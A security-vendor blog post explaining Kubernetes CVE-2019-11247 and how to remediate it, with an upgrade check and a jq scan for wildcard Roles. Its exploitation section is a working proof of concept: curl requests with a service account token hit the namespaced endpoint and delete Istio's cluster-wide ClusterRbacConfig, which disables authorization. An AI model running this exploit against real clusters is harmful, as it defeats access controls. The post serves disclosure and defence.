
Aug 5, 2019

How to Remediate Kubernetes Security Vulnerability: CVE-2019-11247

By: Karen Bruner

A new Kubernetes security vulnerability was announced today, along with patch releases that address the issue in Kubernetes versions 1.13, 1.14, and 1.15. CVE-2019-11247 discloses a serious vulnerability in the K8s API that could allow users to read, modify, or delete cluster-wide custom resources, even if they have RBAC permissions only for namespaced resources.

If your clusters aren’t using Custom Resource Definitions (CRDs), you aren’t affected. But CRDs have become a critical component of many Kubernetes-native projects like Istio, so many users are impacted. This vulnerability also doesn’t affect clusters that run without Kubernetes RBAC, but running without RBAC puts you at even greater risk than this vulnerability does. We still strongly recommend enabling and using Kubernetes RBAC.

Although CVE-2019-11247 has been assigned a medium-severity CVSS score, it poses an especially serious threat when custom resources are used to manage functionality related to cluster or application security. For example, the Istio service mesh creates dozens of CRDs, both cluster-wide and namespaced, for its configuration.

Remediation Steps

The best way to close this vulnerability is to upgrade all your Kubernetes cluster masters to a patched version. Open-source upstream Kubernetes versions 1.13.9, 1.14.5, and 1.15.2 include the fix. If your clusters run on a managed Kubernetes platform, or if they run version 1.12 or earlier (which no longer receives upstream patches), check with your provider to see whether a fix is available and how to apply it.
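To confirm which version your cluster masters are running, you can check the server version reported by kubectl. The output shown here is illustrative for a patched 1.15 cluster:

$ kubectl version --short
Client Version: v1.15.2
Server Version: v1.15.2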

If upgrading immediately is not an option, check all the Roles in your cluster. Make sure none of them allows the wildcard “*” for resources or apiGroups, following the best practice of explicitly granting least privilege. One way to scan for such Roles is shown below.
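The following is a minimal sketch of such a scan, assuming jq is installed; it prints the namespace and name of every Role whose rules contain a wildcard in apiGroups or resources, and is not a substitute for a full RBAC audit:

# Print namespace/name for each Role with wildcard apiGroups or resources.
$ kubectl get roles --all-namespaces -o json \
>   | jq -r '.items[]
>       | select(any(.rules[]?;
>           ((.apiGroups // []) | index("*")) or ((.resources // []) | index("*"))))
>       | "\(.metadata.namespace)/\(.metadata.name)"'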

How It Works

Normally, K8s RBAC Roles can only grant permissions for resources in their own namespace. The K8s RBAC API should reject grants to resources in other namespaces or to globally-scoped resources, and it should deny access to any resource outside a Role’s permission scope. Cluster-scoped resources should be accessible only to accounts with a ClusterRoleBinding to a ClusterRole carrying the appropriate resource permissions. These principles should apply whether the resource is defined by a standard Kubernetes API or by a custom resource definition.
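For reference, here is a minimal sketch of how access to a cluster-scoped resource is normally granted; the ClusterRole, ClusterRoleBinding, and service account names here are hypothetical:

apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: clusterrbacconfig-admin    # hypothetical name
rules:
  - apiGroups: ['rbac.istio.io']
    resources: ['clusterrbacconfigs']
    verbs: ['get', 'list', 'delete']
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: clusterrbacconfig-admin-binding    # hypothetical name
subjects:
  - kind: ServiceAccount
    name: cluster-admin-sa    # hypothetical service account
    namespace: default
roleRef:
  kind: ClusterRole
  name: clusterrbacconfig-admin
  apiGroup: rbac.authorization.k8s.io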

The bug covered by CVE-2019-11247 arises from incorrect handling of K8s API calls made for globally-scoped custom resources. If the API endpoint is scoped with a namespace, the permissions are evaluated in the scope of that namespace, even though the resource is global. As a result, a service account whose Role contains wildcards (“*”) and that has a RoleBinding in any namespace can act on cluster-scoped custom resources simply by passing that namespace as the scope of the API call.
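Concretely, both of the following endpoints refer to the same cluster-scoped resource, but a vulnerable API server evaluates their permissions differently. These are the exact paths used in the proof-of-concept below:

# Cluster-scoped endpoint: correctly requires a ClusterRole via a ClusterRoleBinding
GET /apis/rbac.istio.io/v1alpha1/clusterrbacconfigs

# Namespaced endpoint for the same cluster-scoped resource: permissions are
# incorrectly evaluated against Roles bound in the "default" namespace
GET /apis/rbac.istio.io/v1alpha1/namespaces/default/clusterrbacconfigs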

Exploitation Example

Here’s an example with the Istio ClusterRbacConfig CRD. This custom resource is globally-scoped, meaning it cannot be targeted to a particular Kubernetes namespace and applies to the entire cluster. It is particularly critical from a security standpoint because it enables and sets the default enforcement of Istio’s Authorization system (Istio RBAC) for the entire cluster.

The tests shown were run on a Kubernetes cluster running version 1.12.8 with Istio 1.2.3.

apiVersion: 'rbac.istio.io/v1alpha1'
kind: ClusterRbacConfig
metadata:
  name: default
spec:
  # Apply to all namespaces except those explicitly listed below
  mode: 'ON_WITH_EXCLUSION'
  exclusion:
    # Apply to all namespaces except istio-system and kube-system
    namespaces: ['istio-system', 'kube-system']

Now if we have a service account with a single RoleBinding in the default namespace with the following Role specification:

apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: cve-2019-11247-role
  namespace: default
  labels:
    app: cve-2019-11247-test
rules:
  - apiGroups: ['*']
    resources: ['*']
    verbs: ['*']
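For completeness, the RoleBinding granting this Role to the proof-of-concept service account might look like the following sketch; the binding name is illustrative, while the service account name cve-2019-11247-sa matches the one visible in the API responses below:

apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: cve-2019-11247-rolebinding    # illustrative name
  namespace: default
  labels:
    app: cve-2019-11247-test
subjects:
  - kind: ServiceAccount
    name: cve-2019-11247-sa
    namespace: default
roleRef:
  kind: Role
  name: cve-2019-11247-role
  apiGroup: rbac.authorization.k8s.io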

We can run the following proof-of-concept:

$ kubectl get pods
NAME                                   READY   STATUS    RESTARTS   AGE
cve-2019-11247-test-7b9fc4c9f7-rgd2f   2/2     Running   0          3m44s
helloworld-v1-7b984f4489-9ww5n         2/2     Running   0          3m45s
$ kubectl exec -it cve-2019-11247-test-7b9fc4c9f7-rgd2f -- /bin/sh
Defaulting container name to cve-2019-11247-test.
Use 'kubectl describe pod/cve-2019-11247-test-7b9fc4c9f7-rgd2f -n default' to see all of the containers in this pod.
$ curl -D - http://helloworld.default.svc.cluster.local:5000/hello
HTTP/1.1 403 Forbidden
content-length: 19
content-type: text/plain
date: Mon, 05 Aug 2019 22:01:48 GMT
server: envoy
x-envoy-upstream-service-time: 9

RBAC: access denied

Istio currently blocks access because the ClusterRbacConfig requires authorization, and no authorization policy has been configured between these two services (cve-2019-11247-test and helloworld).
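Under Istio 1.2’s RBAC, granting that access would normally take a ServiceRole and ServiceRoleBinding along these lines; this is a hypothetical sketch, with illustrative resource names, that assumes the test pod runs as the cve-2019-11247-sa service account:

apiVersion: 'rbac.istio.io/v1alpha1'
kind: ServiceRole
metadata:
  name: helloworld-viewer    # illustrative name
  namespace: default
spec:
  rules:
    - services: ['helloworld.default.svc.cluster.local']
      methods: ['GET']
---
apiVersion: 'rbac.istio.io/v1alpha1'
kind: ServiceRoleBinding
metadata:
  name: helloworld-viewer-binding    # illustrative name
  namespace: default
spec:
  subjects:
    # Hypothetical: assumes the test pod's service account
    - user: 'cluster.local/ns/default/sa/cve-2019-11247-sa'
  roleRef:
    kind: ServiceRole
    name: helloworld-viewer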

However, with a simple exploit for this vulnerability, this same service account can change that:

# kubectl delete clusterrbacconfigs default
Error from server (Forbidden): clusterrbacconfigs.rbac.istio.io "default" is forbidden: User "system:serviceaccount:default:cve-2019-11247-sa" cannot delete resource "clusterrbacconfigs" in API group "rbac.istio.io" at the cluster scope
# kubectl delete clusterrbacconfigs default --namespace default
warning: deleting cluster-scoped resources, not scoped to the provided namespace
Error from server (Forbidden): clusterrbacconfigs.rbac.istio.io "default" is forbidden: User "system:serviceaccount:default:cve-2019-11247-sa" cannot delete resource "clusterrbacconfigs" in API group "rbac.istio.io" at the cluster scope
# curl -k -H "Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)" \
>   https://$KUBERNETES_PORT_443_TCP_ADDR:$KUBERNETES_SERVICE_PORT_HTTPS/apis/rbac.istio.io/v1alpha1/clusterrbacconfigs \
>   -X GET
{
  "kind": "Status",
  "apiVersion": "v1",
  "metadata": {
  },
  "status": "Failure",
  "message": "clusterrbacconfigs.rbac.istio.io is forbidden: User \"system:serviceaccount:default:cve-2019-11247-sa\" cannot list resource \"clusterrbacconfigs\" in API group \"rbac.istio.io\" at the cluster scope",
  "reason": "Forbidden",
  "details": {
    "group": "rbac.istio.io",
    "kind": "clusterrbacconfigs"
  },
  "code": 403

Those responses are as expected. This service account should not have permission to read or delete any resources that are not in the default namespace. However, if we call the API endpoint for /clusterrbacconfigs as though it were in the default namespace, the K8s API incorrectly allows the requests:

# curl -k -H "Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)" \
>   https://$KUBERNETES_PORT_443_TCP_ADDR:$KUBERNETES_SERVICE_PORT_HTTPS/apis/rbac.istio.io/v1alpha1/namespaces/default/clusterrbacconfigs \
>   -X GET
{
  "apiVersion":"rbac.istio.io/v1alpha1",
  "items":[
    {
      "apiVersion":"rbac.istio.io/v1alpha1",
      "kind":"ClusterRbacConfig",
      "metadata":{
        "annotations":{
          "kubectl.kubernetes.io/last-applied-configuration":"{\"apiVersion\":\"rbac.istio.io/v1alpha1\",\"kind\":\"ClusterRbacConfig\",\"metadata\":{\"annotations\":{},\"name\":\"default\"},\"spec\":{\"exclusion\":{\"namespaces\":[\"istio-system\",\"kube-system\"]},\"mode\":\"ON_WITH_EXCLUSION\"}}\
"
        },
        "creationTimestamp":"2019-08-05T21:57:25Z",
        "generation":1,
        "name":"default",
        "resourceVersion":"25941",
        "selfLink":"/apis/rbac.istio.io/v1alpha1/clusterrbacconfigs/default",
        "uid":"0273b405-b7cc-11e9-b6a0-42010a80005d"
      },
      "spec":{
        "exclusion":{
          "namespaces":[
            "istio-system",
            "kube-system"
          ]
        },
        "mode":"ON_WITH_EXCLUSION"
      }
    }
  ],
  "kind":"ClusterRbacConfigList",
  "metadata":{
    "continue":"",
    "resourceVersion":"29150",
    "selfLink":"/apis/rbac.istio.io/v1alpha1/namespaces/default/clusterrbacconfigs"
  }
}
# curl -k -H "Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)" \
>   https://$KUBERNETES_PORT_443_TCP_ADDR:$KUBERNETES_SERVICE_PORT_HTTPS/apis/rbac.istio.io/v1alpha1/namespaces/default/clusterrbacconfigs \
>   -X DELETE
{
  "apiVersion":"rbac.istio.io/v1alpha1",
  "items":[
    {
      "apiVersion":"rbac.istio.io/v1alpha1",
      "kind":"ClusterRbacConfig",
      "metadata":{
        "annotations":{
          "kubectl.kubernetes.io/last-applied-configuration":"{\"apiVersion\":\"rbac.istio.io/v1alpha1\",\"kind\":\"ClusterRbacConfig\",\"metadata\":{\"annotations\":{},\"name\":\"default\"},\"spec\":{\"exclusion\":{\"namespaces\":[\"istio-system\",\"kube-system\"]},\"mode\":\"ON_WITH_EXCLUSION\"}}\
"
        },
        "creationTimestamp":"2019-08-05T21:57:25Z",
        "generation":1,
        "name":"default",
        "resourceVersion":"25941",
        "selfLink":"/apis/rbac.istio.io/v1alpha1/clusterrbacconfigs/default",
        "uid":"0273b405-b7cc-11e9-b6a0-42010a80005d"
      },
      "spec":{
        "exclusion":{
          "namespaces":[
            "istio-system",
            "kube-system"
          ]
        },
        "mode":"ON_WITH_EXCLUSION"
      }
    }
  ],
  "kind":"ClusterRbacConfigList",
  "metadata":{
    "continue":"",
    "resourceVersion":"29180",
    "selfLink":"/apis/rbac.istio.io/v1alpha1/namespaces/default/clusterrbacconfigs"
  }
}

And with the Istio RBAC controls disabled, we can hit our original service endpoint:

# curl -D - http://helloworld.default.svc.cluster.local:5000/hello
HTTP/1.1 200 OK
content-type: text/html; charset=utf-8
content-length: 60
server: envoy
date: Mon, 05 Aug 2019 22:15:02 GMT
x-envoy-upstream-service-time: 169

Hello version: v1, instance: helloworld-v1-7b984f4489-9ww5n

The effects of this Kubernetes vulnerability will be different for each cluster, depending on which Custom Resource Definitions (CRDs) are in use. Upgrade your cluster today or check the remediation steps above to protect yourself, and subscribe to our blog to stay up-to-date on Kubernetes security.